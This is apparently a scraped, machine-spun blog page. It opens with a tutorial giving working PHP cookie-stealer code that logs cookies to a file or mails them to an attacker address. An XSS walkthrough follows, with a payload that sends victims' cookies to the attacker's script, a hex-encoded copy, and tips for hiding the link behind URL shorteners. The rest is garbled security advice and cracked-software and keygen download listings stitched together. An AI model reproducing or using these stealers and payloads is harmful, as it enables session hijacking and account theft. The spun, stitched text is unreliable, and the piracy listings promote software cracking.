How to make cookie stealer Programming in PHP?~ get via email


Here is the easy cookie Stealer code:
Cookie saved in File:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>
$cookie = $HTTP_GET_VARS["cookie"]; grab the biscuit from the present url(stealer.php?cookie=x)and shop the cookies in $cookie varying.

$steal = fopen("cookiefile.txt", "a"); This start the cookiefile in add method so that we can add the thieved biscuit.

fwrite($steal, $cookie ."\\n"); This will shop the thieved biscuit within the computer file.

fclose($steal); near the started out computer file.

Another version: Delivers cookies to the cyberpunk email 
 
<?php
$cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@mailprovider.com", "Stolen Cookies", $cookie);
?>
The above value will email the cookies to cyberpunk email using the PHP() email operate with topic "Stolen cookies". 

Third Version
<?php
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}
function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
    fclose($log);
}
logData();
?>
 The above cookie stealer will shop the following information:
Ip address
port number
host(usually computer-name)
user agent
cookie

This Content is for Academic objective only, published for Moral Online hackers. This details is for developing attention about the Internet Threats.

How to do cookie Taking with Combination website Scripting Weeknesses ? : XSS Tutorials



if anyone, tries these online hackers against any company or whatever that creates him to trespass the safety actions and delivers him under the lawful justice. This guide is ideal for the enhancement of security and for PenTesting,  research by lawful security organizations.

Requirements:
A cookie Stealer value : Get it from here
Free Web web host service
Basic Information about XSS
Basic Information about Pc Cookies
Cookie taking is the procedure of taking advantage of the XSS weeknesses (Non-persistent/persistent) and grab the cookie from the sufferer who check out the contaminated weblink. These cookie will be used to bargain their records.

Step 1: Developing Cookie Stealer PHP file
Get the Cookie stealer from the weblink i described.  In that publish, i have described three editions of cookie stealer.  We are going to use the third edition.
Copy the value.
Open Note pad and insert the code
Save the information file with .php extension
Eg: Stealer.php
Now make New information file and preserve it as log.txt (leave it as blank). Don't modify the name , this is the filename what we give up php information file.

Now you will have two files;
1. Stealer.php
2. log.txt

What these two information files do exactly?
The above Stealer.php information file get ip deal with,cookie and shops the information in log.txt information file.
The log.txt has cookies , ip deal with information.

Step 2: 
Register in a 100 % free web-hosting assistance and sign in into your cpanel.
Now start the File Administrator in cpanel.
Upload the Stealer.php and log.txt to main directory or public_html directory.

Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .

Step 3: Exploiting the XSS Vulnerability
So Far , we have pointed our saw.  Now we are going to use it.
Once you set up everything and discover a Insecure website,then provide the following value in the Insecure websites.

<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

Cookie Stealing with Non-Persistent vs Chronic XSS:
Persistent: if you provide this value in Chronic XSS vulnerable website, it will be there permanently until administration discover it.  It will be proven to all customers.  So assailants don't need to deliver any weblink to others.  Whoever visitthe web page, they will be vicim.

Non-Persistent:
In situation of Non-persistent strike, enemy will deliver the weblink to sufferers. Whenever they check the site, it will grab the cookie.  Most of websites are susceptible to Non-persistent XSS .

In Non-persistence, Attackers will deliver the treated weblink sufferers.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

The above weblink is clearly reveals the programs.  Hackers can Hex-encode this program  so that sufferer can't see the program.
For Example:
hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e
Still , the weblink look lengthy. The enemy use one more technique to cover up the lengthy url i.e url reducing websites. There are lot of websites that reduce the lengthy url into small url.

For example:
hxxp://www.tinyexample.com/twrwd63

Once the sufferer check the site, his cookie will be saved in log.txt information file.

How to be Protected from this attack?
Use No-Script Add-on. This is best security to keep away from XSS
Never Simply select the Shorten url
Sometime you may want to adhere to the reduce weblink.  If so, then obvious all cookies in your web browser and check out through Proxies or VPN(it will cover up your ip.

protecting actions against hacking


Possible solutions to Web page Vulnerabilities

Malicious hacking often takes mainly two factors, some time to program. This implies that most web websites or applications are insecure in some way. But it also indicates that most flaws can be secured by some time to applications; for example, in the perspective of hacking, the difference between a five-digit security password and an eight-digit security password along with a number is roughly 22,000 decades. I mean by this that it would take a cyberpunk, using some kind of thesaurus strike program around 22,000 decades to discover your security password if it was eight alphanumeric figures. As a standard principle, implement your customers into creating security passwords of at least 8 figures long and ask them generously not consist of words discovered in the thesaurus. This is for your website's security as much as their own and that of their other customers.
Web Forms
Web types are an simple focus on for online hackers or anyone who basically wants to break your applications, as the user is given the opportunity to successfully pass details to your web hosting server, which functions computations using that details.


Closely related to invisible area adjustment, barrier overruns are designed in a identical fashion; any text feedback area with a maxchar=n residence can be used to possibly closed down the hosting server. The source value can be utilized, and the maxchar residence eliminated. The cyberpunk then goes into, say, 10,000 ones and gives up the type. What happens next? The hosting server turns down, taking your business with it. A semi-secure remedy to this would again be to protected any HTML type source. A better remedy would be to spend storage dynamically, therefore not presetting the storage barrier to a certain size, or writing a function that assessments the duration of the feedback before moving the results to the hosting server. If the feedback surpasses the storage allowance, basically successfully pass returning a NULL value.
A simple, yet effective technique in stopping online hackers is to set up your web hosting server to hand out specialised mistake 404 pages with a position of 200 when a source is not discovered. Most authentic customers will not even notice, and a cyberpunk using program to check out for available sources will think they have came across a silver my own. When the cyberpunk goes to check, they will discover that they have been tricked and hopefully see analyzing your site further as a pointless. This could be seen as hacking online hackers or the cyberpunk becoming the compromised...
Netcat
You could take this one step further and use an old UNIX program called netcat to accident anyone who efforts to crack your site. Netcat makes and allows TCP relationships, but it can be used by a cyberpunk for many factors, such as acquiring distant accessibility a spend, port-scanning and even hi-jacking solutions and skipping fire walls. It can also be used to observe slots and overflow dubious demands, just like a barrier over-run, by using it to imagine you are running a assistance that you are not and using the 'yes' control when someone tries to manipulate that assistance. Netcat is an effective program in itself and is usually part of any self-respecting hackers' tool-kit. Fairly, you could look at this as reaching it returning first.
Conclusion I hope that I have attracted your attention to some of the more primary but often neglected entry-points that a cyberpunk may use to gain admission to your web applications, and outlined the need for primary auditing of the security administration of your site.
This article is not designed to be a complete remedy for protection against hacking, but more the kick off point for your concerns. No website is completely hack-proof, but there are few websites that really need to be. As a web designer ,your primary security concern is first to evaluate how much security you will actually need. The more protected you need to be, the more your is designed will move toward choosing the solutions of a professional security remedy.
   
PREVENTING HACKING ACTIVITY
The most well-known method of security against hacking among personal house people who use computers is anti-virus program. Companies such as McAfee.com Corp. provide anti-virus program that tests a pc's hard drive for contaminated material, notifying customers when bad data files are discovered. Firewalls, typically used for pc systems, have also become well-known with house customers, particularly those who use constant online relationships such as wire locations and digital prospective subscriber lines. Firewalls act as a obstruction to hacking by defending private systems from the public, thus keeping most strangers from tampering with pcs.
Other program options—mainly used to protected larger pc systems—include Attack Recognition Techniques (IDS), material filtration program, sand-boxing program, and actions research program. IDS is considered one of the best security methods for huge systems. With an IDS in place, program directors can observe network demands and identify large-scale harmful strikes. Content filtration program is innovative anti-virus program that flows compacted data files and allows IT supervisors to set specific filtration factors to prevent harmful email. Sand-boxing program defends against harmful requirements. The program makes a secured space within a pc where dubious value can run, before it has a chance to communicate with the primary os. Still in its beginnings in 2001, actions research program defends pcs by tracking entire systems and verifying every control of all functions.

window.google_render_ad();
Unfortunately, many harmful online hackers eye security systems systems not as a obstruction but as a simple hurdle to get over. However, as long as hacking strikes continue, both individuals and businesses will continue to spend money on applications and program designed to protected systems from undesirable visitors

A Few Protecting Measures
-If you utilize a web cms, register to the development blog.

-Update to new editions soon as possible. Upgrade all 3rd party segments as a matter of course — any segments including web types or allowing member file submissions are a potential risk. Component flaws can offer accessibility your full data source.

-Harden your Web CMS or posting foundation. For example, if you use WordPress, use this guide as a referrals.

-If you have an administration sign in web page for your customized made CMS, why not call it ‘Flowers.php’ or something, instead of “AdminLogin.php” etc.?

-Enter some complicated data into your sign in areas like the example Hypodermic injection post shown above, and any else which you think might befuddle the hosting server. If you get an uncommon mistake concept exposing server-generated value then this may betray weeknesses.

-Do a few Google hackers on your name and your site. Just in case…

-Use a no-right-click program.
This stops simple duplicating of images and easily watching the source. Note: This can be circumvented by using Javascript.
-Use supports.
This stops watching of the source from the top of the site. Note: This can be circumvented by using web browser history.
-Encrypt the supports web page.
-Encryption can stop online hackers completely. By using several security applications sources become un-readable. Note: Even security can be defeated.

Defender of the Crown Complete Adventures Free Download

Sniper Ghost Warrior 2 S.E Complete Free Download

Image

Image


SALIENT FEATURES
Movement Feeling Induce System: a creative first in which the way the gamer variations the operator impacts the on-screen taken. Like in real-world sniping, in-game capturing needs a stable press of the pad’s trigger so that when the circular is shot, the weapon is more precise. Snazzy jerk the trigger and the circular is tossed off, thus losing the focus on and notifying a very inspired attacker to your existence.
Realistic Ballistics: the characteristic of the Sniper series is the authenticity of its capturing characteristics. Breeze rate, range, severity and bullet-drop all perform crucial tasks in the performance of your taken.
Refined Shooting Mechanics: a appropriate respiration strategy to stable your pulse rate is as important as determining the time on focus on of your circular, and the best snipers control both their center and their head. From getting focus on until the slowly stable trigger take, a sniper must take together everything to get the perfect “one shot; one destroy.”
Improved Enemy AI: the Synthetic Intellect (AI) program was absolutely re-tooled and developed from the begining. Much of the upgrades were made possible from the change to the CryEngine 3. Anticipate everything from flanking motions to front attacks as the attacker tries to interact with you in close areas where your weapon is less effective.
New Target-Rich Environments: Sniper Phantom Soldier 2 contributes new city surroundings like Sarajevo and dangerous hill landscape to go along with woods that are as lavish and dangerous as ever.
Various Problems Levels: To broaden game play and make it available to the largest number of players, CI Activities is presenting three difficulty stages that absolutely change the characteristics of the experience. You decide how to perform – either rest and be the greatest predator or analyze your expertise and experience the experience on Professional Method.
Bullet-Cam: everybody's preferred function profits to compensate expert injections and show the battleground from a absolutely new perspective. See what the exchange of kinetic energy – a bullet’s true avoiding power – can do to the attacker from 1000 metres or more!
Bullet Penetration: concealment does not actually mean protect. In Sniper: Phantom Soldier 2, principal points act as they would in the actual world and are able to delivery opponents concealing behind various types of includes. You can also try to line up your opponents and let a single circular take out an whole team. Hang on ‘til you see that on Topic Cam!
Expanded List of Sniper Rifles: Try out the globe's most innovative sniper guns, each of them carefully regenerated so that they perfectly imitate the contemporary weapons found on the present battlefields.
New Gear: own the evening with the release of heat and evening perspective optics, plus a couple of extremely effective field glasses crucial for finding the attacker before they identify you.

DOWNLOAD LINKS

COLD FEAR COMPLETE FREE DOWNLOAD

  1. Cold Fear presents a new kind of scary experience in a regularly moving atmosphere out at sea. You'll play as Tom Hansen, a US Shore Secure crewman whose team is sent to examine an discontinued European whaling deliver. As you search further within the ship's bloodstained patios, you'll experience lots of wicked animals. To endure, you must remove your opponents, avoid blocks, and get information from other figures on the deliver.
    DOWNLOAD LINKS
    OR

Paper Monsters v1.0 Cracked Free Complete Download

Image

Image

SALIENT FEATURES
Traditional 2d sidescrolling activity play with stunning 3d surroundings.
Original and lovely figures
Awesome unique soundtrack - headsets suggested
Fun under water and traveling powerups.
Two management types: "floating" Joystick or classic touch pad
Game Middle allowed for leaderboards and success
Large Stages with a lot invisible goals to find
Dash method for limitless replay value!
Fun for any age gamer
Universal for iPhone, iPod

FREE DOWNLOAD

AVG Internet Security 2013{x64/x86} Build 13.0.2890 Final+Keygen Free Download


Image
AVG Internet Security - a software package for comprehensive protection for your computer. Includes Anti-Virus, Anti-Spyware, Anti-Spam, Firewall. This software package includes all the tools to protect your PC from dangerous objects. AVG Internet Security blocks the penetration of viruses, trojans, worms, spyware, etc. The package also protects against theft of personal information, and a module to deal with rootkits helps get rid of malicious processes, masking the virus. Protect your PC is functioning perfectly, and while working in the network is constantly checked both the boot and the messages that come through the Internet pagers. Also scanned the websites you visit, and if they pose a threat (a phishing or viruses), then access is blocked. There are anti-spam module, which will prevent receiving unwanted advertising mail, and firewall successfully protect against network attacks. 


All the products included in the AVG Internet Security, you can customize to your liking, and, it is done in one window and virtually no problems. 



The main components of AVG Internet Security: 



• Anti-Virus (Kaspersky) 

Antivirus performs detection of viruses, worms and Trojans, as well as executable files and libraries in DLL, which can be potentially unwanted within the system. Anti-Virus also has an internal virus database. 

• Anti-Spyware (antispyware) 

Anti-Spyware protects your computer from all types of malware such as spyware that collects data from the computer, and advertising programs. 

• Anti-Rootkit (Antirukit) 

Anti-Rootkit scans for dangerous rootkits hidden in applications, disks, or the DLL. A rootkit is a package of malware that allows an attacker to gain access to the level of administration or to the entire network. 
• Firewall (firewall) 
Firewall defines rules to protect your computer from external attacks, mainly from the Internet, and managed (allow / restrict) connections on each network port. If the Firewall detects intrusion attempts, immediately blocks its components and does not allow an attacker to gain access to the computer. 
• Anti-Spam (Spam) 
Anti-Spam checks all incoming email. mail and notes unwanted messages as spam. The component uses several methods of analysis, ensuring the highest possible level of protection. 
• LinkScanner (scanner links) 
Includes LinkScanner Active Surf-Shield and Search-Shield. Active Surf-Shield prevents accidental contamination from unwanted automatic downloads and other exploits, but also checks the security of visited web pages. Search-Shield works with search services, Google, Yahoo, Bing and others to provide opinions on the safety of all search results in real time. 
• E-mail Scanner (Scanner e-mail) 
E-mail Scanner checks incoming and outgoing email messages. mail using plug-ins designed for the most ubiquitous e-mail clients. When a virus is detected moving in the repository of viruses. 
• Identity Protection 
Identity Protection provides continuous protection of digital data from new and unknown threats. Identity Protection adds signatures based on the protection of AVG Internet Security by tracking the behavior of programs on your computer and automatic locking action, which can lead to identity theft and do not require renewal. 
• Web Shield 
Web Shield protects your computer from accidentally downloaded an infected file or infected files, obtained by instant messaging. 
• Resident Shield 
Resident Shield scans files when they are copied, opened or saved. When a threat is detected prevents its activation. Also component provides important protection for the system areas of your computer. 
• System Tools 

System Tools advanced settings for advanced users - contain information about processes, network connections, automatically starting applications, Internet Explorer extensions and Layered service on the computer.
AVG 2013 is even faster, easier to use, and protects like never before: 

• Significant progress in speeding up scan - faster by 50% 
• There are several new options to define exceptions for scanning files. 
• Added "cloud" scanning technology, verification of running applications (whitelisting), and anti-phishing protection. 
• ID protection has been fully integrated into the product. 
• Completely redesigned firewall, lists of "trust" technology protection of personal data. 
• Advanced game mode. 
• Improved monitoring and reporting of errors during the upgrade. 
• Update the user interface, improved navigation. 
• Ability to assign sounds to certain events (the scanning began, the threat found, etc.). 
• Fast installation on your PC. 
• Other internal improvements. 

AVG Anti-Virus engine has received numerous awards for its excellent detection of malicious code. AVG certified by independent certification companies such as: VB100%, ICSA, West Coast Labs, Checkmark and other AVG products protect more than 80 million PC users around the world. 

AVG scans in real time: 

• All files including documents, photos, music and applications 
• E-mails (all major email programs) 
• Instant messaging and P2P communications 
• Files and online transactions such as shopping and banking 
• Search results and any other web-links 

New Features in Version 2013: 
* Improved scanning using enhanced scanning algorithms for faster scanning. 
* Improved compatibility with a detected 3rd party Firewall. 
* Refined threshold for browser memory consumption. 
* Boot accelerator optimizes time needed for boot up. 
* Fresh and new user interface for easier navigation and better user experience. 
* AVG 2013 is fully compatible with Windows 8. 
Fixes & Impmrovments 
* Anti-Rootkit: Improved reporting of corrupted sections. 
* Anti-Spam: Improved configuration of all Anti-Spam components. 
* DNT: Fixed crash in urlmon.dll in Windows 8. 
* General: Alert Manager component has been removed. 
* General: Update selection dialog has been removed. 
* General: System Tools component has been removed. 
* Outlook Addin: Fixed possible freeze and compatibility issue with Kerio Outlook Connector. 
* Safe Surf: Fixed issue with upload speed while Safe Surf is running. 
* Safe Surf: Fixed issue with occasional crash when analyzing *. Swf content. 
* Scheduler: Only one scheduled scan can be running at the same time. 
* Setup: Driver installation logging has been extended to provide enhanced information. 
* Setup: Search Shield component will not be installed by default, but only after having been selected for installation. 
* Update: Fixed problem with rollback of failed update.

Devil May Cry 3 Free Special Edition Complete


Image

SALIENT FEATURES
Set before the unique Devil May Cry, Devil May Cry 3: Unique Version follows Dante's trip in the fight against his wicked double sibling in any conflict. On the way, you'll experience two powerful enemies and uncommon figures. When fighting, you can select to use short-range, long-range, protecting or challenging perform designs. Each system has its own set of game play functions, and you can select to turn your preferred style for improved special strike capability. The special edition contributes the capability to perform as Virgil and Dante's attacker a success method game.  
FREE DOWNLOAD LINKS